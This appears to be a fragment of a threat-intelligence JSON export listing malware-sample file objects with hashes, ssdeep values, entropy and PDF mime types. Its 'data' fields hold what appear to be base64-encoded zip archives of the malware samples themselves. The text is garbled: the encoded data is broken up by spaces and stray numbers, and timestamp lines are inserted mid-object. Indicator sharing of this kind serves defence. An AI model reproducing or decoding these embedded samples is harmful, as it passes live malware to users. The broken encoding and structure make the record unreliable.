Q K w j K r V l v e v 48 D Z U u S t u a 0 n m g 5 X n Z B B s g u S 0 R v O 3 v D g D 5 X n I B p g / o 8 y m d a e U Z N r + 6 K W T H 0 9 u h I Y E t r B n 3 v 9 L 4 D I P Z 6 j O S 0 B x Z 4 k Z m s W x l U c O k o z V a J M O k v 8 Z 4 Q g 9 d L r 7 i h 8 e k e G D x k 7 D s K P Z f a 95 v W G y M g f i n d 53 R Q k 0 i g n v q 5 b N G o t O C r h i R E U 0 C i 1 x 8 p k 4 g N + O 0 9 o O l f t + f 9 f t j 2 X R V d 3 Q u 39 r 0 m a E D T R A M M 2 i C 6 c 3 A 6 v I F 9 v u f G h m Y o V z o U q l K i + 8 E M D 724 e i n q Z C u B B H b S 1 o 8 h y x 5 k A O D A J 0 x e n Y G m l + A F R B C E F m g d r C 51 J T 5 G N t 0 H D 9 o O y v 3 R 7 l 2 / 3 N j M d f t g m q E S a l 2 e Y 9 s v m J J K f 8 + h x 2 w s 8 i O k E D 41 i V l k 2 n 59 B T 1 u l j K G Q 4 H r c 3 h 0 l y H 678 v A 3 t A 7 n w u L G n E w P 9 A q o q L K 9 j M M t L H t 8 H Z K b G O w 1 B B g K m F Y Y E / f 6 Y b n g 2 M n m A r 3 f A L a K b I X w h R X s R E e V 3 u 4 b M y / x Q 43 s f U Y g 8 y 9 M z o n M N R a X 7 W Y g V k B 4 a m w T 2 T 0 t 5 h f I y g N F b i 0 m h Z r C 9 m 45 v 99 m f k 53 n + X F d V w / v S 0 d / u W U A q u 1 B D 8 o c E L i d K / R A J 1 y X c B l 26 K C Z F N Z q 1 S K H x K p 6 l e Y M Y C L B l m w j k 0 R Q + + 0 U K r q s V w E / D b 7 p 2 k d Q + + r v r Z D B V j r E c Y g K M B 4 e A Z j 9 Z Z e d f w l D K A l / I j 0 R 9 p b I p 7 i M T 4 I 0 G Q x I R C S 8 y 3 k X A 0 N P D E w R R k 39 l v H D Y Z F h 9 w 9 T h H a I 8 a T N z j q c 9 E h d 9 D b v R c q i P A L 8 O 37 x 600 M L A Q J o 7 s z p a g S J y Q c U d 4 z 6 u C I q 0 F g r q Z n f j T B S u 7 X + 1 C y G U p n T y D x m E P I T m 8 / K W r 984 C x y K b Y r j 2 z o k r 83e5 q R d R T u 8 G / h c 5 a 6 h P y 4 u q T 0 u 8 P O r h c p l z S B d Q g r x 1 B 2 Q S P f V a r s 6 e j L H J 4 x l a T z k 9 J q T C 32 F w U b Y f E 546 g U 2 Y b d V Q p V D 24 K W v a 3 k B 5 K V B 0 E E b x p l 4 q 8 v K X i r H K j 2 Z W A z 5 C g i I P z q g K 6 N 6 y M w k j W 1 A L a 2 d 0 Q A W q / v 9 f z p Y H q v y A 4 a u + L b z A 2 a f g r l X p / T L w E F q C b O v U J w U n t M 9 F c b N B P j C i g 7 l O I r H / Z q V C l 7 c 1 x x W p 12 W d J 6 N j s o G o G z c + b X 4 J a L E S h c t 0 W N Z p b J 0 M o N E F j C E 7 n 3 V A i N G W v K l O + l L F r 3 a W R d 1 I L R R 0 M D z F J d w m j y S 5 n Y x m 9 i u d P + b k b e S j w J B x 93 Z A q c M G j l E 2 b X Q E h P J X 5 y U R j G Z + R h s D J g h Z E V F n U Y k N t O e Z u M K B N S K z t + l Y a 7 C O S m k a B j e M l Y r y K b f B D A T p 7 x E H T i W x M A r d f Q h A 2 o s r s J p n X e V s Q k i / E C l 7 x i 5 h g 6 V s P T B a u d Y i 7 T H H 60 K Y u g H K T e v 1 t X G O s F Q D P d g 2 q w n 5 B g W c S E L Z R H I 0 2 o K t 4 Z Y F G 8 Y K x a D d 1 w t V k L d x O q z F F Y d Q x V 2 A 5 j 0 m b k 6 S r v T / y H 8 c h R T C l Y W M g 51 W c N O 8 q 5 z A f 8 U N 0 r T s Q M C u C F 5 d C i 3 M L F P x i R 19 X l O l U 5 V K G 2 c e Y P E r y A 6 f y B u A T M U e m b + a X T b C G 4 w M 9 g Y e 6 p 9 B s a Q 7 / q g A + V J k d 2 B h 5 y l r F F s p / A d + O Z E + F M i W h d b 4 J y h F l p I O K g B 7 + r a 0 + H T h C m s Q I f k 96 e e X B m 0 D 4 Q N K w A h C 4 p U q Z 3 r u v r t m k B s a T Z i Q 1 U I v g K e b u a k H 9 I x W 0 p U y Y Z w b F c d 5 H 90 c j J m + H p g v B Y l 1 N 62 S t p c 4 l b F / R l 83 p 0 c 4 K q S 8 s o 2 d 4 e Q d D y 3 Z 6 e p v K n Y u T g V m q V e 0 d z w K J 5 v C x 90 Q E G 3 F Z U e W N R D / Q D s u R X K B 0 P l w u h w j o 1 w J O D H z h X l 6 t f A v e r M o I h G R 3 s O f Y L g z 5 J J w / a x U J a W K F a L w f S m r O V G w o n i M 9 T + B K q z S e M S m C b g 3 R n o i M T p V x 3 / I U z X / A p q L Q g Q s O D H l b m X i 44 l 6 k f o o C c n q i v X k i a a q Z D Q 5 V N 1 P r r N r P N Q M r 2 C l z R s w J L B b I l r u E w K r g p f + p B e F t 2 k t N k t K N c w n S b Q w F M Z j M e u d n 5 J K 8 W R n 9 G J l d 3 g e n 4 v s B s V C m s r G U 4 O B v p P o g / 46 e K T q w F G y 4 O E B H a 8 j / k E P K e i V P G V J E E o r 0 k q B p 5 I 93 b m 9 Q D k B o p q 0 N R n q X o y R D 13 n i Z H j Y F x H b P o X M 8 j n v l R a L H N h U W T W h G Z f Z K t e Z L v m x x j p 7 G F V 9 R Q 7 J F D U e T Y F h T G N n f 2 E I u K B v U 6 I E 0 k 2 X E 2 Q 2 R 9 t v l B m h Q / b W y 8 V 7 Y / L j 3 f + 80 d A 2 r a 4 k d l Q r m / Z 1 y C T a W P S L U i 8 t D 2 J A d N W P 4
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "malware-sample" ,
"timestamp" : "1558002049" ,
"to_ids" : true ,
"type" : "malware-sample" ,
"uuid" : "07f193f7-a908-4329-9e8a-5d1a6bd40e53" ,
"value" : "0fb825db2262d98e29846fa67171e3450666af9c0a6c31eaf8d7c84539be9132|1baa024f9cfab48b92c297aa406c91b5"
} ,
{
"category" : "Artifacts dropped" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "mimetype" ,
"timestamp" : "1558002049" ,
"to_ids" : false ,
"type" : "mime-type" ,
"uuid" : "0b0304f8-ab9e-4924-b6a1-b7291803ce22" ,
"value" : "PDF document, version 1.5"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "ssdeep" ,
"timestamp" : "1558002049" ,
"to_ids" : true ,
"type" : "ssdeep" ,
"uuid" : "148d1bc6-d3dd-49ed-b3d1-c5cc30262a5d" ,
"value" : "12288:Jn4ijMb7m7MUeGApKWxw1RFn/68R4V6Sp22leUWd3FM:Jn4iQUwQDkp6hdVM"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "File object describing a file with meta-information" ,
"meta-category" : "file" ,
"name" : "file" ,
"template_uuid" : "688c46fb-5edb-40a3-8273-1af7923e2215" ,
"template_version" : "17" ,
"timestamp" : "1558014404" ,
"uuid" : "06a84b03-0560-46ae-8570-1e7072a0b400" ,
"ObjectReference" : [
{
"comment" : "" ,
"object_uuid" : "06a84b03-0560-46ae-8570-1e7072a0b400" ,
"referenced_uuid" : "f5647ba0-86e7-40fa-92a2-7d0fe024a7c2" ,
2023-04-21 13:25:09 +00:00
"relationship_type" : "analysed-with" ,
2023-12-14 14:30:15 +00:00
"timestamp" : "1621850122" ,
"uuid" : "5cdd65a8-491c-4501-8732-49aa950d210f"
} ,
{
"comment" : "" ,
"object_uuid" : "06a84b03-0560-46ae-8570-1e7072a0b400" ,
"referenced_uuid" : "5cdd63dc-0e48-4b97-bb9e-43ff950d210f" ,
2023-04-21 13:25:09 +00:00
"relationship_type" : "contains" ,
2023-12-14 14:30:15 +00:00
"timestamp" : "1621850122" ,
"uuid" : "5cdd69c4-87a0-4200-ba88-4f2a950d210f"
}
] ,
"Attribute" : [
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "filename" ,
"timestamp" : "1558002050" ,
"to_ids" : true ,
"type" : "filename" ,
"uuid" : "bc94e837-8569-47ba-a3c3-a02aebb103eb" ,
"value" : "c052025b442995f04a68b1b6b2007c36dbf47448c08dc249219a7f3eebd369c2"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "size-in-bytes" ,
"timestamp" : "1558002050" ,
"to_ids" : false ,
"type" : "size-in-bytes" ,
"uuid" : "3f3a29bb-f7ba-4fe5-8823-73432e467e81" ,
"value" : "156088"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "entropy" ,
"timestamp" : "1558002050" ,
"to_ids" : false ,
"type" : "float" ,
"uuid" : "c2b56f8b-f45f-4abf-b452-24e36ba56cf3" ,
"value" : "7.9280918012902"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "md5" ,
"timestamp" : "1558002050" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "2e505349-8cef-486b-b663-4402b68fb50f" ,
"value" : "da877f4f7335264b03ac72fca5b305dc"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha1" ,
"timestamp" : "1558002050" ,
"to_ids" : true ,
"type" : "sha1" ,
"uuid" : "3d519a57-9449-485d-b7ca-de88d71cbd4d" ,
"value" : "435aa871cdd772072390d9baceaa8d832208d710"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha256" ,
"timestamp" : "1558002050" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "b31694d6-1a08-4521-9524-95da503b92f4" ,
"value" : "c052025b442995f04a68b1b6b2007c36dbf47448c08dc249219a7f3eebd369c2"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha512" ,
"timestamp" : "1558002050" ,
"to_ids" : true ,
"type" : "sha512" ,
"uuid" : "04ff64c4-bf4a-46db-add2-184108ce92de" ,
"value" : "6ff7cb6507259bc322a8d400c34060d17e33483dab5b035d519447b2756a49da236acc54a413227168d7926ce758dfb169c8d92d58d2cc9b0c81cb6de383a1fd"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"data" : " U E s D B B Q A C Q A I A J l i s E 6 w q w o + z T E C A L h h A g A g A B w A Z G E 4 N z d m N G Y 3 M z M 1 M j Y 0 Y j A z Y W M 3 M m Z j Y T V i M z A 1 Z G N V V A k A A 4 I 53 V y C O d 1 c d X g L A A E E I Q A A A A Q h A A A A K r d C + 5 F I S 7 u u 58 m N v f p + S F O b t t G C k G 2 O S o t d G e Z y P K A e I M N K C 7 f S K 3 / o h J v 9 s a m 0 0 q f M F k Y v U f 6 A u K g F G b j / r d 69 C A e X U F N T 9 S l q 1 K o 3 Z Z o i X f 7 S Y G Y 5 e / r y z 1 M o 0 n u 4 R S H h E I I D X w p n W u L I r i 1 d u m + N Z v F u V 0 Y 0 + + W w y g C J 5 W u 4 F G D Y 0 u R F g y g s y u q n 9 o Z k I m k e Z Y K u E i N P z i d 95 A k G 0 7 A 6 z 0 S V W o Z k O + m f 3 s o f x p / 9 u M z C F s a x T k z h I w W 7 e C T 2 t 1 r 6 t f l F o 0 n m Y c p c c j + + / Y V y r d a n m o / 9 a d s 5 y 8 U x m a Y k l v K 1 p Y I k + D P a b O L y V h i e 8 P 2 B B f L N g u Z t H N S Y o W l D T f x h O 4 x X s 0 21 p k h M e N s x e 7 B k C w s v l x P X m Y 0 I 9 s j 3 b b I D 4 u F u z 3 E R b d U u D R q c x l J R 4 q O 2 r i S k K G 4 + C + b O A m z u 8 N I 6 r + X Q 4 a j C Y H V j 6 w D b D 8 Q r g m T / H l v h h V K z p r i 1 a B V x A g I k j + h Q m g 5 m C E 29 l Q K G k r 1 d G 4 m 9 L 4 G P y + J q Z i P 0 U C r j m 8 n 0 v P D H p t d 4 + G w W r B z P D h 4 m / F d I s S h + E v B 99 n P D h x S j 21 + J f B d v R C 5 l P V 4 M V 7 A N 318 B g w x S t W + 9 i V y v Y v D M h k s G g u / 0 L E R Q F A 2 c 5 O j W I b w K z 6 J R j x D 0 o 0 o L f b f t F a a 4 S z g 64 d T a 1 W O q r R E d v C g t 80 x U j X J K M K O + p 1 + H 2 S 4 C Q h Q l P a r r O s A i f 9 T 8 o X Z L O L q z X 1 F A 71 O X b 9 o O H 2 y L O q Z / x 5 d 5 U S G P 0 k s q e / 8 K 7 / 8 O 4 L U M 3 M l t F D u 93 c x F t R X b S i n B v z z F J 6 L a p o s R M b 94 J Z H Q u B + Y 69 D C W X V z m v U 9 Z u 5 U i I k E b U W N Y H N o p R K V p E Z S A F N 9 m b Y X T 0 o 9 Y K W 6 G 48 e R k r x W b I 9 x K N F 8 z c D X 5 P T m H E l u N h A x x 3 T T X 2 M N r t Y w w 2 t I q p B i u 7 D M v H d J s S 4 x F t M M Z H h K K 7 Q 0 x u y W e h B f y n q C J A K R 0 n 0 u p + v A C y 6 S 45 L u p v 2 l e u E S G J A g W q s I H P n I 5 L / I L N i h u G M C p r h 79 z s u A 7 g a W p + A 41 h I C 2 C R H k e T x + b p w X p B u r S h C K 4 K r o P l U C r Y g q d Q j b q U a d H G K U u e b d A e P V 7 J 8 l G 1 y v X h 0 d 6 T b T T / M z U h V L m 5 w f 4 q g E 7 q 7 q W W M M 60 G w R H F O 2 N n X / v 3 U L B 3 a z 1 S s f N h 6 C X 6 w n u n p i W O 7 r O o f 2 z 3 z v 6 V E R n N k 52E52 p F Y v X y Z p R Z 8 C e L g M a d k C q g l d t v 72 t + z z A o F + s 2 K Z C B d 9 Q r J G c H 7 j 1 J C h 6 D 6 c F I d a U A 0 c C L X N h x U A K 1 x z K b Q 6 U 7 L w p I o S E J 91 U P C j 9 d 6 k R w Q E 5 H 9 I e c 68 + c 8 l w R W F T f P x C n d O L b o Y Y L f 8 L + y i I b / E B u s 7 f 55 / j l 7 r W + Q V + M l W t L A f w C m f i r s a 8 q y I 2 m V S 9 E V P q 5 + n O q f o q H 4 X m o l 8 l e A Y W B s 9 g i c d / 0 8 d 1 M b U o 0 K Z D 1 o 1 X 9 M c U 95 k l + g O M G 8 F j M 7 E j y P X Z N D a y k w q t + j N j R R 6 k o 7 O / j 7 F 4 v 0 y T U D I B k O 8 q x h v 97 j E y k / C D M v F 8 s L 6 m X b a 6 X d / B O D g 5 + Z n C + O d k A o e t L m P y v 0 q O C t s t K 1 T U X b A C h G A h F a g b H c k u B j / Y U g o B b w o m a 2 a E m j 0 p L n m y 2 C 0 x q x 0 U 1 z v 5 l / K 0 Q K C W b w F 9 s f w a f N 1 Q J y E 8 J X Q d c e U Q J N b Z p 8 e d C V c Q 39 Q a W q 2 R L N j k 77 S q R t l S I W l P R v Z 5 T b x J 1 m b Y Q h C q T Q X H D Z F b t v m d W q I A O X R K 0 j K b u X Q 4 c + d 9 R t 0 W g 0 y 0 g z z h t P b d P p O 2 F M r o R Y P w R m 5 L Q I I r 74 F u 0 5 H x O J F C d + K f f q F t n + G 75 w F 6 I 2 P Q 2 g a V + v t 4 L G P f h z a r X 4 u y u i T n m 6 P p v G b 7 k k O x F g W i W J 2 R 5 c C a v A h v B i W J R L 2 C u r 5 Q G M A A P 46 R J X o 1 j D D n Y 3 C b 6 C 7 Z t R M G h G t z F H p C u D W e x 2 c 2 l q I L L G Q H I P 0 a q V l b n r 7 y m E 9 q 6 a x M D V U c e N 1 e V x Q / q e I V X Q f l k 3 U v E L 7 V R e b b h 2 K B 83 W x c A 3 E H j v O C 3 T d s 8 f m 0 W 1 h G R l c o S G d Y L B i y i v V 55 F O v O J Y 2 Z V B N Y p J Q o Z U J d v 2 O u A q v / I Q k 4 N Q R p G W u H Z / k m o I j 6 N j s o u U p D V l 35 W q b S K b x i r L s 0 u r w H L 8 t M c h K Z W g 3 R W n P T S n 36 z B U d o + l y n C o z 9 Q i v d D M c s U l U g N W / 0 a / J d A Z 2 + B 5 A I X s 5 c d I G m 5 X J o 2 U f H 3 C n u r P I D t Q 7 X K Q A o 6 z Z C l R h t 3 j N C Y d 3 k M V n R 374 f l U V Y 3 Z A p l 6 I I b H U b i 52 z v n Q t 1 K 3 F r D e 4 e c r T v g F S K E P S g E u y A P t + C m N y S b o T y c K u T a c L 9 D e z O N I 9 K K + 6 s h X 0 K i 1 B z 4 b 7 i 2 O H Z K U k n u D m y k o m 0 L + d f / 1 u w T y W 3382 O C 9 P x 0 8 u 6 z 1 c T P G 4 z h y 1 M r 6 d / o V 728 y q 1 k g g U h g x p p t m b P 6 A x l G B 65 d 4 U k 3 I f F i 8 G 28E5 r j C v 34 b 4 Y v w e 7 v A 6 V 1 V T A F h n b u 1 s y / K D N 9 A x 6 M x 4 + A v / 3 w z 5 M P x 94 T + p P w s N v M D t u c v M 2 z K D m 5 e q I G N 8 X o B s Z C f F H a 1 v t 4 m C 2 H I U S D + 30 P / 4 f M Q Z f D F l A T b p 5 + K r A f C U 0 z 0 s + z Y H A I f Y r 5 / 4 g f d d B E H 8 H 1 Q y t 1 r h 2 J n P b B E M L M a / 9 k Z g l w h F Q k s b t 9 P R E H y L i + w m p + a l e L 33 H M O 1 a Y G O R S T p c j c G o E T B 9 Q j p Q I J 0 M e r D 586 i / s a U J p A O O C G j 3 Z m m F O w Y s U e 8 U a 60 l N a w t C C o m U / Z Q q W I 5 n O 4 j v a X P u V P M 4 b 8 h t j R E J r S F l S N Z H u S i 1 f x T Q y h G / 0 l / e g W N c G F c / 19 D 3 l l j j j u v d 9 / E U e Y 4 S Q v U X V x H l G J I 2 x q 4 m h y 8 + A / g N m / V u Z K h t N k Y l r f r y m X u V W Y R I R Y U o 1 k / x + n S h D 6 s 6 Q 9 d c c J D U D 3 R z 9 F b x l P 6 k X D M E M T Y S e W R i L A r d 0 k x H P t w A h P 5 Q c 8 f d d 2 a F p G P W 1 m n I l N 798 j O O O v 7 E O k v p d D x N f P v a E K H T g E S H I H P L J K K x c a p F O r / U 4 T s U d q y D p u y z Z Z q G t 73 F a n S 1 f I c s U Z u c Z I s z W 0 S D S 5 K B w v o p o G z m R J i X v z Q E u j i + 4 s R d F 8 u E P M i X g z F f t L I w q A N q Q i B Z f 9 i Y H C j V + u z B K g 2 g X c c Y s w W x b + 4 s i b 0 j Z q B 3 e + Y l 7847 t 3 v W G 6 G 1 w a e H l a o x T d 5 U k G w R J D 3 D 3 W 4 e G X Y 21 I G l j E g r G Q m 12 U 9 S 4 i 5 A o H 4 e w c 5 O N G A j 52 s G M x N U d 3 R l b m J m u g w D R c + W f e 8 u E L Q g X B s J k l a J n Z Y P i n P a t A 3 N x w j Z I B 1 g S E h Q w 3 n S 8 M y I r 97 G W z k u O / z 6 Z j h c Z y p P Z e 0 + Q 4 D h p + K 9 s D z U 4 f / 0 Y p / N D h q K A a m v q + J / Q t W 3 N + A f b 9 T a n x i G + C 9 a w H h Z Q O 6 x g u c J 5 l G m 12 s 0 e o Q F g u / j x g 8 / n X c 37 j 1 g K P i I 6 + e k R x W y / a J n n p K U A X a c t + S 3 i z l I g o u 6 w L P Q 3 C N z + f K h E v E i R A X x d u 5 m M X 8 E L P W S g V q M + b W 40 e H M 96 N E h 2 u N L B g j X t S 0 e G e 77 W s 3 D r K K X b h G O C z 9 o M i i m F P k 1 I / S i 9 x j G T x i a 4 s m g i D b + f i 2 c r N U P 6 r I Y K c Q + v 8 D E w 2 x I W 31 w r 2 g G M h b K q n B W x l D M l q J T u Q H X b N z o V G m X 9 J G L g K I b l 4 o o Z 4 g b E X l O f z v Y J n N l p d M l 8 z i h U 8 h G B k m I z W p l Z L q s Z R d I G g a / 7 e s q c W F i Q E f 4 N B S D M m g 0 25 / l 5 H W l 5 a H / Y e K l a 5 z 3 / e w K B C l h G V Y B s g b G M q f B 2 R 9 F H S F u / d 72 O D Z / g m V S h Z e 8 o o s 8 Y q a x k f e n O y 61 z K K O 2 q y N u I r F q b g 8 N Z g n r c Z m 1 I A K s f 2 Y z k 56 c D H K R B H h 5 t 5 u V V j 9 f Y P y 63 b v S 2 u m v B D / S u K L H a K d d w 0 b J k 1 D M A C 67 A 4 i 3 H H R A t R I W r S S o l V a 43 R a 8 h K s H Q c 4 W V 85 l Y J S a O l D i i / f m d R 8 o j L g X N 4 q h i 5 U 4 M 88 M F p 2 I B h j Q c 7 H L z j v y h o w t 8 T 1 r Z D p F R / 4 o 4 v m R T B a X 63 H 8 z p P j G C 89416 X P l a a G 26 B N u a 7 k a h + b A I / 7 B j V H f 0 m 7 X J r f L J A K c E X Q R t f L p 7 n K J A m W 8 D 3 n / N Q w A i B m Z 0 8 H S N P f 9 L P b q r V I k e Y T 6 / f 2 d L G x 0 M g C
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "malware-sample" ,
"timestamp" : "1558002050" ,
"to_ids" : true ,
"type" : "malware-sample" ,
"uuid" : "5f3f86c7-bbf7-4237-9367-5a2323ad3106" ,
"value" : "c052025b442995f04a68b1b6b2007c36dbf47448c08dc249219a7f3eebd369c2|da877f4f7335264b03ac72fca5b305dc"
} ,
{
"category" : "Artifacts dropped" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "mimetype" ,
"timestamp" : "1558002050" ,
"to_ids" : false ,
"type" : "mime-type" ,
"uuid" : "a73530a3-b1a1-4dde-a59e-a0254334e7c7" ,
"value" : "PDF document, version 1.7"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "ssdeep" ,
"timestamp" : "1558002050" ,
"to_ids" : true ,
"type" : "ssdeep" ,
"uuid" : "144713fb-cb60-4aad-8df0-27c4fc1554de" ,
"value" : "3072:zr3i3ArGdqMW/5DsvvqTfAL3LKhMbgfGSL2YxPfmXfj:H3i3ASXQgvSA/K7XiYxG7"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "File object describing a file with meta-information" ,
"meta-category" : "file" ,
"name" : "file" ,
"template_uuid" : "688c46fb-5edb-40a3-8273-1af7923e2215" ,
"template_version" : "17" ,
"timestamp" : "1558014495" ,
"uuid" : "453258ef-0925-4471-9dcc-a06ab8038664" ,
"ObjectReference" : [
{
"comment" : "" ,
"object_uuid" : "453258ef-0925-4471-9dcc-a06ab8038664" ,
"referenced_uuid" : "d9bdc42c-191f-49a2-8cbe-2604f5462df6" ,
2023-04-21 13:25:09 +00:00
"relationship_type" : "analysed-with" ,
2023-12-14 14:30:15 +00:00
"timestamp" : "1621850122" ,
"uuid" : "5cdd65a8-6488-4fac-ad64-4c68950d210f"
} ,
{
"comment" : "" ,
"object_uuid" : "453258ef-0925-4471-9dcc-a06ab8038664" ,
"referenced_uuid" : "5cdd683b-6530-4b0d-a8de-40c1950d210f" ,
2023-04-21 13:25:09 +00:00
"relationship_type" : "contains" ,
2023-12-14 14:30:15 +00:00
"timestamp" : "1621850122" ,
"uuid" : "5cdd6a1f-b41c-449a-8342-4502950d210f"
}
] ,
"Attribute" : [
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "filename" ,
"timestamp" : "1558002051" ,
"to_ids" : true ,
"type" : "filename" ,
"uuid" : "13bb957d-6f07-4439-a847-0a6b2508215c" ,
"value" : "f2676b94952018c220ee352b9857bc5ad62195b2d15cdfaf54fa5c5985d6934a"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "size-in-bytes" ,
"timestamp" : "1558002051" ,
"to_ids" : false ,
"type" : "size-in-bytes" ,
"uuid" : "026f11f4-03ec-4b2a-8bc8-0917c7f973cf" ,
"value" : "485888"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "entropy" ,
"timestamp" : "1558002051" ,
"to_ids" : false ,
"type" : "float" ,
"uuid" : "0787676c-4547-4e8a-b435-7c4fc9b56a4e" ,
"value" : "7.9068746522467"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "md5" ,
"timestamp" : "1558002051" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "0cd9671a-e2c6-4cf2-aca0-093dba80a02d" ,
"value" : "b830fd2997e1f124f34d77ff1fa9b89e"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha1" ,
"timestamp" : "1558002051" ,
"to_ids" : true ,
"type" : "sha1" ,
"uuid" : "78b64775-ba51-4fd4-b372-d2c20019e168" ,
"value" : "ea43350c37e0c266c12d0fd53643cf94dd58c1f7"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha256" ,
"timestamp" : "1558002051" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "c59d71ff-6b93-4669-9ab0-c4d588ab40bf" ,
"value" : "f2676b94952018c220ee352b9857bc5ad62195b2d15cdfaf54fa5c5985d6934a"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha512" ,
"timestamp" : "1558002051" ,
"to_ids" : true ,
"type" : "sha512" ,
"uuid" : "968963e4-412e-415b-9d42-752c1132a4f8" ,
"value" : "24a7f8c2e5d774554c69113b4b81a9755113db1ac620e0d9f0339919a0982e7c169446cb0fe4f3a9232f757a9ccd82676f55207cc044033e3485d1f22d965de1"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"data" : " U E s D B B Q A C Q A I A J p i s E 7 F V f Z s b s s G A A B q B w A g A B w A Y j g z M G Z k M j k 5 N 2 U x Z j E y N G Y z N G Q 3 N 2 Z m M W Z h O W I 4 O W V V V A k A A 4 M 53 V y D O d 1 c d X g L A A E E I Q A A A A Q h A A A A V a b 4 N t h 0 g 5 t x b k P N E O K 6 Q S m p Z E P H L v C F F 4 v c M M + l n b M V H B c V M I b L a a 5 + 4 i 54 h m Y 9 I v y U I 49 m 98 K r U T 2 A r s B f s X L T S v k a M c f I e M 7 l / c 0 U w + L 7 u W p m K l k M g b L e W U o L n 9 J Z k 2 V V v t / j w c D C D Z g v c Z r C P s T 18 b c 0 P Y U d J Y a N 30 / y w D 6 U 5 h 2 s g o E E O p E S Q y / V c y X x l Y U y A C u e H 3 J i 3 G U n 3 v m K u m p E 1 S z o W q 4 C S J r r w A j C 93 f s B d 1 j L 3 z F T o y a Q T z q q b M + J I 16 t s C O 41 R k h D i Y F 0 P 2 p k m 6 m 48 O t 7 y T k N u E u o s P 85 c k P 9 W w d 2 v r + l 6 N M 4 U z R L s 3 Z Y 3 + 1 B k i d h N Q 1 w / 1 U J E g g 7 y W t i Y U S 2 t r Z L / B W B / Z P N / 0 o L 407 Q m 5 N + C w B R l t 7 s f a D v 5 r 9 o Q W x O c u E a B t v Y M j 3 y W 9 g S h Z M e 4 R u g V K t z 0 Z C n F y R K 5 H x G o 3 t u z O a + 9 Q h L W Q G U v B W + n v o Q A Y B / M 5 i u Y O X v N / j 94 h 0 u 6 T X C q f s O 2 D C a i G 94 m 0 t L q L 1 a Q C T 2 I P + b G F J g p G X u 0 7 x + 4 o U 0 q g z K k F V y P z X e p H A / H d t W O E u z 5 V h R h E K c Z m b B H 62 b g 0 j e l I 8 M F o W I + 4 w s P 8 p S Y 1 + g 3 P a H 9 Q m S 2 c g I 6 u 3 q O W P 4 H 7 l y U / N T b b N U X W / c B b h P B 8 r M r r G U m u s L E x c N 0 q W L Z X q 6 F x j X E 4 J Z 0 S J A m o 82 y H M c T S m E //Wbn/krI4Ev3hIWh649tM5cnBPx5ilLaXu8qKk4NQ8Ru23BYMm5V/ADLKp1+4G4Fv/gyQbGlm86p8GBeuXIpYMLWrmEuePDyz4Ye3DKHHor6AkQ9yUlKb2zQ2H7UzLiM2iLHE0opiG42bmbUVfJa7WmGxrHWs2IscGAQUBpAg0s5BRGlbccpwZKA/QumlmlSGljbv4NaCEU/nA7Hnmd5ZZkg4t/zm9UvP6956pWSLkIb7pZByCz+QokPkue6hdi/HID56/sNj7R2KzpJQQedCVieaqmtjFnOlfcJQva+o3Xzu4F+ufFWNCpoEd3gxYtdHL3nrruDhOxge4WRKVU5dBmTlvfBnKNArcPlMLRGBPfxRrDw3l2ipMPRMLPGr9t0d+mMT0Wh/kQtDQ+ghWYB0ZoZbAYEi/Degykev6rxhxkZ1A1dJyvBvOFro4kl9RlDNMRmwvfNPQqesHq/LjutFblVv6p4cRZa2jomYfqrlyPDFmqRa695TNAIQFxGaeiRmXfdFq1sWbrN0JOl195ZI+VMF+k6ia4O0EpZVl1POiyU04H2/KkUI6AIBgxbzobKIbT0AHGlHGmiPNXvY/eYrA+IkZW1Vz+SUXf0GjpOIf3HTN6XcSS3/9GI3GVpxcWJziPlNb9B4WQs5Ra3clu/9dq8PghcdoS6/0SoWpFjwBH+gP0ZGDECnoYV/PW8mNT4xlZtdzXRbO8gAnh7kJW0Lj/8oLJoMODqJmyfhQGMAnbt9AOohGN7JCaIDssDxVDcH7T3sElnCX10sNb3hTtywdT3nHzG/nJyHtD0nIsYEd/PWGMtVIKZJGjvV99C43/JXFNZNAdYBnb/hSiBbky664IKgNk/P67PsChA45KFob6Bo27AE4hXskIXi8vFCCvSvD69+MZ2Tl+lGglrDxZNK